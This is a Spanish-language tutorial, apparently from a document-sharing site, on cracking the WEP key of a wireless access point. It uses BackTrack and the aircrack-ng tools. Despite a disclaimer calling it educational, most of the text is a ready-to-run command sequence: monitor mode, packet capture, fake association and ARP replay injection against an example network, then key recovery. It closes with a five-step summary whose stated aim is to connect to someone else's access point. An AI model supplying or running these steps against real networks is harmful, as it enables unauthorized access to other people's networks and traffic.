Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Como Obtener Claves WEP de Redes WI-FI
Como Obtener Claves WEP de Redes WI-FI
Herramientas requeridas
Computadora con tarjeta inalmbrica para inyeccin de paquetes (Realtek RTL8187, Intel Pro Wireless 3945, etc.) LiveDVD de BackTrack el cual http://www.backtrack-linux.org/downloads/ se puede descargar de:
BackTrack es un DVD que se puede arrancar prcticamente en cualquier computadora con lector de DVD, incluye los controladores necesarios para las tarjetas de inyeccin de paquetes ms utilizadas en el mercado.
Glosario de trminos
AP: Es el punto de acceso inalmbrico del cual obtendremos la contrasea y nos conectaremos posteriormente. MAC Address: Es una direccin nica de control de acceso al medio, la cual la tienen todos los dispositivos que se conectan en red. Se encuentra en un formato hexadecimal (p. ej. 00:11:22:33:44:55) BSSID: Es la direccin MAC del punto de acceso ESSID: Se refiere al nombre del punto de acceso. (p. ej. linksys, default, belkin, INFINITUMXXXX, etc) TERMINAL: Es la lnea de comandos en Linux, similar a MS-DOS WEP: acrnimo de Wired Equivalency Privacy, y es la herramienta de seguridad ms utilizada para redes inalmbricas
Advertencia
INGRESAR A REDES INALMBRICAS DE FORMA NO AUTORIZADA PUEDE SER PENALIZADO POR LA LEY. ESTE MANUAL EST HECHO CON FINES EDUCATIVOS PARA FACILITAR EL APRENDIZAJE SOBRE SEGURIDAD DE LAS REDES INALMBRICAS, EL USO INDEBIDO DE ESTA INFORMACIN ES RESPONSABILIDAD DE QUIEN LA UTILIZA PARA LOS FINES QUE DESEE. EL AUTOR DE ESTE MATERIAL Y LA INSTITUCIN DONDE SE IMPARTE ESTE CURSO SE DESLINDA DE TODA RESPONSABILIDAD LEGAL SOBRE EL MAL USO QUE SE LE PUEDA DAR A ESTE TUTORIAL.
Implementacin
Se recomienda antes de arrancar el LiveDVD de BackTrack conocer el canal en el cual est transmitiendo el Access Point del cual queremos conocer su contrasea WEP, para ello se puede utilizar un software como el NetStumbler el cual se puede descargar de: http://www.netstumbler.com/downloads/ Adems tambin ser necesario conocer la direccin MAC (direccin fsica) de nuestra tarjeta de red inalmbrica, la cual se puede averiguar tecleando en CMD el comando ipconfig /all ser necesario tenerla a la mano para los siguientes pasos. Inserte el LiveDVD de BackTrack en su unidad de DVD y arranque desde dicha unidad. Probablemente necesite hacer cambios en el BIOS de su computadora para que la primera unidad que arranque sea el DVD. Una vez que inicie sesin en Linux, deber escribir el comando startx para iniciar la interfaz grfica de BackTrack. Una vez estando dentro de Backtrack tendr una apariencia grfica similar a Windows, deber hacer clic en icono con una pantallita negra situado en la parte inferior izquierda de su pantalla, para abrir la Terminal
Una vez hecho clic, se abrir una ventana de Terminal y se deber teclear el comando iwconfig y dar Enter para ver las interfaces de red que tenemos en nuestra computadora. Deber aparecer una tarjeta llamada wlan0 como en la siguiente imagen:
En seguida deber teclear el siguiente comando: airmon-ng start wlan0 [CANAL] donde canal se refiere al canal en el cual est transmitiendo el Access Point del cual queremos saber su contrasea. En la siguiente imagen utilizamos el canal 6 para fines de demostracin:
Al hacer eso se nos va a crear una nueva interface llamada mon0 en la misma ventana de Terminal o en una nueva deberemos teclear lo siguiente: airodump-ng -w [ARCHIVO] -a -c[CANAL ] mon0 en el cual archivo ser el nombre del archivo que crearemos y canal ser el mismo que pusimos en el paso anterior (en el cual esta transmitiendo el AP). Para fines de demostracin se tecle el comando: airodump-ng -w /root/captura -a -c6 mon0 y el archivo se cre en el escritorio:
Una vez hecho esto se comienzan a guardar la informacin que el Access Point transmite. Para el siguiente paso se tiene que abrir una nueva ventana de Terminal y se debe teclear lo siguiente aireplay-ng -1 30 -e [ESSID] -a [BSSID] -h [MAC DE SU TARJETA DE RED ] mon0 en el cual se pone el nombre de la red a escuchar, su direccin MAC y la direccin MAC de nuestra tarjeta. Para fines de demostracin se escribi lo siguiente: aireplay-ng -1 30 -e INFINITUM2402 -a 001495EB2F09 -h 00212F2DCCDA mon0 como lo muestra esta imagen:
Este proceso ayudar a asociar nuestra tarjeta inalmbrica con el Access Point del cual queremos obtener su contrasea. Ahora necesitamos inyectar trfico al Access Point, lo cual se hace tecleando en una nueva ventana de Terminal: aireplay-ng -3 -x600 -b [BSSID] -h [MAC DE SU TARJETA DE RED] mon0 y el cual en nuestro caso fue el comando siguiente: aireplay-ng -3 -x600 -b 001495EB2F09 -h 00212F2DCCDA mon0 como lo muestra la imagen:
Una vez hecho esto, se comienzan a inyectar paquetes, lo nico necesario ahora es dejarlo para que llegue a un numero grande de IVs, se recomienda sean ms de 60000, por lo que debemos esperar 1 o 2 minutos en lo que los programas realizan todo este proceso. Por ltimo para obtener la contrasea debemos abrir una nueva Terminal y escribir el siguiente comando aircrack-ng [RUTA DEL ARCHIVO-01.cap] el cual en nuestro caso fue aircrack-ng /root/captura-01.cap como se puede apreciar en la imagen:
CON STE LTIMO PASO NOS ARROJA LA CONTRASEA EN FORMATO HEXADECIMAL, LA CUAL DEBEMOS SIMPLEMENTE ANOTAR O MEMORIZAR (OMITIREMOS LOS DOS PUNTOS QUE APARECEN CADA DOS CARACTERES), PARA TENERLA DISPONIBLE CUANDO NOS INTENTEMOS CONECTAR A DICHO ACCESS POINT.
En resumen
Los pasos para encontrar una clave WEP de un punto de acceso inalmbrico son los siguientes: 1. Abrir una Terminal y teclear: airmon-ng start wlan0 [CANAL]
2. En Terminal teclear: airodump-ng -w [ARCHIVO] -a -c[CANAL] mon0 3. Abrir una Terminal y teclear: aireplay-ng -1 30 -e [ESSID ] -a [BSSID ] -h [MAC DE SU TARJETA DE RED] mon0 4. Abrir una Terminal y teclear: aireplay-ng -3 -x600 -b [ BSSID ] -h [MAC DE SU TARJETA DE RED] mon0 5. Abrir una Terminal y teclear: aircrack-ng [ RUTA DEL ARCHIVO-01.cap] Lo cual con algo de prctica, este procedimiento no nos deber de llevar ms de 5 minutos, siempre y cuando el punto de acceso tenga un trfico de paquetes relativamente constante.
Referencias
El rincn del Wi-Fi. (s. f.). CRACKEAR WEP. Recuperado el 22 de mayo de 2010, de: http://www.freewebs.com/thebyber/crackearwep.htm NotiTek. (s. f.). WEP. Recuperado el 22 de mayo de 2010, de: http://www.notitek.com.ar/wep UNDERDOWN, Ryan. (12 de Febrero de 2007). CRACKING WEP USING BACKTRACK: A BEGINNER'S GUIDE. Recuperado el 22 de mayo de 2010, de: http://ryanunderdown.com/linux/cracking-wep-using-backtrack.php